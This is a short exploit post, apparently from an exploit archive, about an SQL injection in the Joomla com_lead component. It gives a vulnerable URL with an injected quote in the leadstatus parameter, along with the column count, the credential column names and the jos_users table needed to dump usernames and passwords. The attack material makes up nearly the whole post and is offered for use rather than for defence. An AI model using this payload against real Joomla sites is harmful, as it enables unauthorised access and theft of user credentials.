id: 12538
date: 06/03/2010
title: Joomla Component com_lead SQL Injection Vulnerability
author: ByEge
cves: 

=====================================================
Joomla Component com_lead SQL Injection Vulnerability
=====================================================


[TR] Title: Joomla Component com_lead SQL Injection
 
[TR] Date: 03.06.2010
 
[TR] Author: ByEge
 
[TR] Homepage: byege.blogspot.com
 
[TR] Vendor: http://www.leadya.co.il/
 
[TR] ExploiT :
 
[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
 
[TR] column number : 14
[TR] column name : username , password
[TR] table name : jos_users
 
[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN



#  0day.today [2023-03-26]  #